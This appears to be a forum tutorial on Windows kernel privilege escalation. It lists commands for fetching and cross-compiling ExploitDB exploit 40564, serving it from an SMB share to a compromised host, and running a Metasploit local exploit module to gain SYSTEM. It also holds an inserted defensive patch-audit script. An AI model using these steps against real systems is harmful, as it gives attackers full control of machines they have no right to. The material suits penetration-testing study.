x32x01

ADMINISTRATOR
This series is dedicated to Windows privilege escalation, so in this post I explain the hands-on commands used for kernel-mode exploitation.

Table of Contents
  • What is a kernel?
  • Prerequisite
  • Hunting Vulnerable Kernel
  • Kernel Privilege Escalation Techniques
    • Kernel Exploit Using Metasploit
    • Kernel Exploit Using ExploitDB

What is a kernel?

A kernel is the computer program that serves as the core, or heart, of an operating system. It manages memory, schedules tasks (processes), and controls access to disks and other devices.

3.png

An operating system has the following separated spaces:

  • Kernel Space: The kernel is loaded into a distinct, protected memory region referred to as kernel space. It is secured against direct access by application programs and by less trusted components of the operating system.
  • User Space: The operating system (OS) acts as a bridge between the hardware and the end user; user space is the memory region in which application programs such as a browser, word processor, and audio and video player run, separated from the kernel.

Kernel Privilege Escalation Techniques

A privilege escalation vulnerability in the Windows kernel means that a locally authenticated attacker who can already run code on the host may execute a specially crafted program in kernel mode and take complete control of the machine.

Tactics: Privilege Escalation
Platforms: Windows

Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.
Objective: Escalate a low-privileged user to NT AUTHORITY\SYSTEM by exploiting the kernel.

Hunting Vulnerable Kernel
An attacker who has a low-privileged foothold will look for a vulnerable kernel build as a route to privilege escalation. The enumeration can be done with a Python or PowerShell script that matches the OS build number (and the installed patches) against known vulnerabilities and returns the matching CVE IDs, which point directly to an exploit that yields Administrator or SYSTEM access.

4.png

Kernel Exploit Using ExploitDB

Once the attacker has a reverse connection, he can enumerate the kernel build (for example with systeminfo), as highlighted in the image below.

5.png

The build information lets him look up a matching exploit if that kernel is vulnerable.

6.png

For this kernel version, we found it was vulnerable to MS11-046 (CVE-2011-1249).

7.png

The same can be looked up with searchsploit, the offline copy of ExploitDB. As illustrated below, we copy the exploit source out of the local database and cross-compile it for Windows:

Code:
searchsploit -m 40564
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

8.png

Let's start an SMB share in a new terminal with the help of Impacket's smbserver Python script, as given below:
Code:
impacket-smbserver share $(pwd)

9.png

This lets us pull the exploit into the compromised shell with the copy command:
Code:
copy \\192.168.1.3\share\40564.exe

Once the exploit has been downloaded, we run the program to obtain a privileged shell as NT AUTHORITY\SYSTEM.

10.png

Kernel Exploit Using Metasploit

Once you have enumerated the kernel build you can search for available exploits online, or use Windows Exploit Suggester – Next Generation (WES-NG) on your Kali Linux machine, which looks up the available exploits for a vulnerable build. Download the script from its GitHub repository:

Code:
git clone https://github.com/bitsadmin/wesng
cd wesng

Note: There are two options to check for missing patches:
  a. Launch missingkbs.vbs on the host to have Windows determine which patches are missing.
  b. Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system (or of a remote system with systeminfo /S MyRemoteHost) and redirect it to a file: systeminfo > systeminfo.txt

11.png

We saved the systeminfo output to a text file named systeminfo.txt and then fed that file to the wes.py script:
Code:
python wes.py /root/systeminfo.txt

12.png

As a result, it determines the missing patches and reports each applicable vulnerability together with its risk impact. In the image below, you can see that it also points to the exploit available on ExploitDB.
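The build-and-hotfix matching that WES-NG performs on a systeminfo dump can be reproduced in a few lines, and the same logic is how a defender audits their own fleet for missing kernel patches before an attacker finds the gap. The following is an added example written for this post; it is not part of the original article or of the WES-NG project. The systeminfo text, the KB numbers and the REQUIRED_PATCHES baseline are constructed placeholders (a real audit would load vendor patch data such as the CSV that WES-NG ships).

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of `systeminfo` output, trimmed to the fields that
# build-matching tools read. Build and KB numbers are illustrative only.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WORKSTATION01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4100000
                           [02]: KB4200000
                           [03]: KB4300000
"""

# Hypothetical patch baseline: build number -> (KB, advisory id) pairs that a
# host on that build is expected to carry. Placeholder data, not real advisories.
REQUIRED_PATCHES: Dict[str, List[Tuple[str, str]]] = {
    "17763": [
        ("KB4100000", "EXAMPLE-ADV-001"),
        ("KB4300000", "EXAMPLE-ADV-002"),
        ("KB4400000", "EXAMPLE-ADV-003"),
    ],
}


def parse_systeminfo(text: str) -> dict:
    """Extract the OS build, architecture and installed KB list from systeminfo text."""
    build_match = re.search(r"^OS Version:.*?Build (\d+)", text, re.M)
    arch_match = re.search(r"^System Type:\s+(\S+)", text, re.M)
    hotfixes: Set[str] = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return {
        "build": build_match.group(1) if build_match else None,
        "arch": arch_match.group(1) if arch_match else None,
        "hotfixes": hotfixes,
    }


def missing_patches(info: dict, baseline=REQUIRED_PATCHES) -> List[Tuple[str, str]]:
    """Return the (KB, advisory) pairs the baseline expects for this build but the host lacks."""
    required = baseline.get(info["build"], [])
    return [(kb, adv) for kb, adv in required if kb not in info["hotfixes"]]


def report(text: str) -> str:
    """Human-readable summary, the shape of output a patch audit would hand to ops."""
    info = parse_systeminfo(text)
    gaps = missing_patches(info)
    lines = [f"Build {info['build']} ({info['arch']}), {len(info['hotfixes'])} hotfixes installed"]
    lines += [f"  missing {kb} -> {adv}" for kb, adv in gaps] or ["  no missing patches in baseline"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_SYSTEMINFO))
```

Run it against a real `systeminfo > systeminfo.txt` dump by reading the file into `report()`; hosts that come back with entries in the missing list are the ones to patch first, since the same KB list is what an exploit-suggester will flag for an attacker.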

13.png

This time we use Metasploit for post-exploitation and look for a privileged shell with NT AUTHORITY\SYSTEM privileges.

Code:
use exploit/windows/local/ms16_014_wmi_recv_notif
set session 1
exploit

On successful execution, it returns a shell with administrative (SYSTEM) privileges.

15.png